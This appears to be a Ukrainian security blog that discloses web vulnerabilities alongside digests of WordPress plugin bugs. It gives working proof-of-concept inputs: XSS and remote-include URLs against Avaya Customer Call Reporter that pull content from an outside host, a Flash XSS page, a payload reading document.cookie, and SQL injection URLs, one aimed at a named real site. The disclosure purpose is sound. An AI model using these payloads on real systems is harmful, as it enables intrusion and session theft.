Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Comment Extra Fields, Booking Calendar та Usernoise. Для котрих з’явилися експлоіти. Comment Extra Fields - це плагін для додавання нових полів в форму коментарів, Booking Calendar - це плагін для створення календаря замовлень, Usernoise - це контактна форма.

• WordPress Comment Extra Fields 1.7 CSRF / XSS (деталі)
• Booking Calendar 4.1.4 Cross Site Request Forgery (деталі)
• WordPress Usernoise 3.7.8 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• FOSCAM IP-Cameras Improper Access Restrictions (деталі)
• Multiple CSRF vulnerabilities on Foscam IP cameras web UI (деталі)
• Multiple Vulnerabilities in Exponent CMS (деталі)
• Vulnerabilities in otrs (деталі)
• Multiple Vulnerabilities in OpenX (деталі)

У грудні, 06.12.2012, я знайшов Remote HTML Include та Remote XSS Include (Cross-Site Scripting) уразливості в Avaya IP Office Customer Call Reporter. Про що вже повідомив розробникам.

Спочатку я ще у грудні й січні повідомив ZDI про інші критичні уразливості в цьому продукті Avaya (про них я напишу пізніше, зараз наведу ці дірки). ZDI повільно відповідали і лише робили вигляд, що вони займаються цим питанням, лише у серпні активно взялися за справу, зв’язалися з Avaya, але ті не відповіли, тому ZDI відмовилися займатися цією справою. А у липні я повідомив розробникам (про ці дірки та інші критичні уразливості), але вони проігнорували моє повідомлення.

RHI (Frame Injection) (WASC-12):

http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua

RXI (Cross-Site Scripting) (WASC-08):

http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua/webtools/xss_r2.html

Вразливі Avaya IP Office Customer Call Reporter 8.0.9.13, 9.0.0.0 та попередні версії. Торік я перевірив у версії 8.0.9.13, а сьогодні в останній версії 9.0.0.0.

Учора я знайшов Insufficient Anti-automation та Abuse of Functionality уразливості на http://ebay.com - сайті аукціону eBay (зокрема на https://scgi.ebay.com). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливість на ebay.com.

Детальна інформація про уразливості з’явиться пізніше.

11.06.2013

У квітні, 14.04.2013, я знайшов Content Spoofing, Cross-Site Scripting та Full Path Disclosure уразливості в Moxiecode Image Manager (MCImageManager) для TinyMCE. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в MCImageManager для TinyMCE.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

16.08.2013

Content Spoofing (WASC-12):

Можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті.

http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?autoStart=false&startImage=1.jpg
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.flv&autoStart=false&startImage=1.jpg
http://site/tiny_mce/plugins/imagemanager/pages/im/flvplayer/flvPlayer.swf?flvToPlay=1.xml

Через xml-файл, розміщений на поточному чи зовнішньому ресурсі, можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті (параметри thumbnail та url в xml-файлі приймають довільні адреси).

Файл 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<playlist>
	<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
	<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>

XSS (WASC-08):

<html>
<body>
<script>
function flvStart() {
	alert('XSS');
}
function flvEnd() {
	alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flvPlayer.swf?flvToPlay=1.flv&jsCallback=true">
<param name=quality value=high>
<embed src="flvPlayer.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>

Якщо на сайті на сторінці з flvPlayer.swf(з параметром jsCallback=true, або якщо є можливість вказати цей параметр для flv_player.swf) є можливість включити JS код з функцією flvStart() і/або flvEnd() (через HTML Injection), то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

Full Path Disclosure (WASC-13):

Повний шлях в кукісах MCManager_im_lastPath і MCManagerHistoryCookie_im.

Вразливі Moxiecode Image Manager 3.1.5 та попередні версії.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах FlagEm, Duplicator та Bit51 Better WP Security. Для котрих з’явилися експлоіти. FlagEm - це плагін для встановлення флагів, Duplicator - це плагін для клонування сайта, Bit51 Better WP Security - це плагін для захисту сайта.

• WordPress FlagEm Cross Site Scripting (деталі)
• WordPress Duplicator 0.4.4 Cross Site Scripting (деталі)
• Bit51 Better WP Security Plugin XSS / Command Execution (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• HP Intelligent Management Center v5.1 E0202 topoContent.jsf Non-Persistent Cross-Site Scripting (деталі)
• HP Intelligent Management Center (iMC), iMC TACACS+ Authentication Manager (TAM), and iMC User Access Manager (UAM), Cross Site Scripting (XSS), Remote Code Execution (деталі)
• Magnolia CMS multiple access control vulnerabilities (деталі)
• Multiple XSS Vulnerabilities in Xaraya (деталі)
• SQL Injection in Dolphin (деталі)

05.06.2013

У травні, 26.05.2013, я знайшов SQL Injection уразливість в Soltech.CMS. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам.

13.08.2013

SQL Injection (WASC-19):

http://site/index.php?level_path=%27%20or%20version()=5%23

Уразливі Soltech.CMS v 0.4 та попередні версії.

15.01.2010

У березні, 04.03.2009, я знайшов Insufficient Anti-automation та SQL Injection уразливості на секюріті сайті http://ufrnsb.kiev.ua - сайті УФРНСБ (Українська федерація професіоналів безпеки). Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

13.08.2013

Insufficient Anti-automation:

http://ufrnsb.kiev.ua/gostevaja_komnata.html

SQL Injection:

http://ufrnsb.kiev.ua/uscr/stand_forms.asp?form_type=-1%20or%20version()=5

SQL Injection уразливість вже виправлена, але IAA дірка досі не виправлена.

17.04.2013

У березні, 15.03.2013, я виявив Cross-Site Scripting та Full path disclosure уразливості в плагінах WPtouch і WPtouch Pro для WordPress. Про що найближчим часом повідомлю розробникам.

Стосовно плагінів для WordPress раніше я писав про уразливості в Search and Share для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

03.08.2013

Cross-Site Scripting (WASC-08):

XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну.

http://site/wp-content/plugins/wptouch-pro/admin/js/ZeroClipboard.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

Full path disclosure (WASC-13):

http://site/wp-content/plugins/wptouch/wptouch.php
http://site/wp-content/plugins/wptouch-pro/wptouch-pro.php

Та інші php-файли в папці плагіна та підпапках.

http://site/wp-content/plugins/wptouch/error_log
http://site/wp-content/plugins/wptouch-pro/error_log

В папці плагіна та підпапках (на сайтах, де відключене виведення помилок в php-файлах і вони записуються в error_log).

Уразливі всі версії WPtouch і WPtouch Pro для WordPress.